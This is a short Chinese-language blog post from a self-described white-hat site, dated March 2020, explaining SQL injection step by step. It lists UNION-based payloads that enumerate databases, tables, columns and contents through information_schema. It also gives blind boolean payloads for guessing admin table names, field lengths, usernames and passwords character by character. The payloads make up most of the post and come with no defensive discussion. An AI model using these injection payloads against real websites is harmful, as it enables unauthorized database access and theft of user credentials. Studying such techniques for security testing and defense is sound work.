menu Secto白帽博客-专注于技术研究
简单地谈谈SQL注入-联合查询注入
211 浏览 | 2020-03-24 | 分类:渗透测试 | 标签:

*Union
我是不是讲过,可以根据网页返回的信息来进行判断?
可以帮助到你节省很多时间的工具例如hackbar什么的我就不介绍了

拓展:查看显示位尝试使用联合注入 利用and 1=2或and 0及id=-12查看显示数据的位置,替换显示位改成SQL语句

and 1=2 union select version(),2,3 //查看信息(当前数据库,版本及用户名)
and 1=2 union select (select group_concat(schema_name)from information schema.schemata),2,3//查询所有数据库
union select (select group_concat(table_name)from information_schema.tables),2,3//查询所有表名
union select (select group_concat(column_name)from information_schema.columns),2,3//查询所有字段名
union select(select group_concat(id,'~',lover)from blyat.cyka),2,3//查询字段内容  如:查询blyat库下cyka表的id及lover字段,用'~'区分id和uname以防字符连接到一起

----------------------//-----------------------

1.判断有无注入点

; and 1=1

2.猜解表名

常见的账户密码表名万变不离其宗admin admuser user pass password这种,所以大家可以就是多研究一些程序的数据库

and 0<>(select count(*) from *) 
and 0<>(select count(*) from cyka) ---判断是否存在cyka这张表

3.猜解帐号数目

and 0<(select count(*) from cyka) 正常---账号数目为1
and 1<(select count(*) from cyka) 报错---帐号就1个 

4.猜解字段名称

and 1=(select count(*) from admin where len(*)>0)-- 
and 1=(select count(*) from admin where len(用户字段名称name)>0) 
and 1=(select count(*) from admin where len(_blank>密码字段名称password)>0)

5.猜解字段长度(lenth) 猜解长度>n(不断变换符号和n的值) 直到返回正确页面为止

and 1=(select count(*) from admin where len(*)>n) 
and 1=(select count(*) from admin where len(name)>6) 错误 
and 1=(select count(*) from admin where len(name)>5) 正确 长度是6 
and 1=(select count(*) from admin where len(name)=6) 正确

and 1=(select count(*) from admin where len(password)>11) 正确 
and 1=(select count(*) from admin where len(password)>12) 错误 长度是12 
and 1=(select count(*) from admin where len(password)=12) 正确

6.猜解字符

and 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位 
and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位 

就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51)
这个查询语句可以猜解中文的用户和_blank>密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.

By:成浩
Time:2020/3/24

知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议

发表评论

email
web

全部评论 (暂无评论)

info 还没有任何评论,你来说两句呐!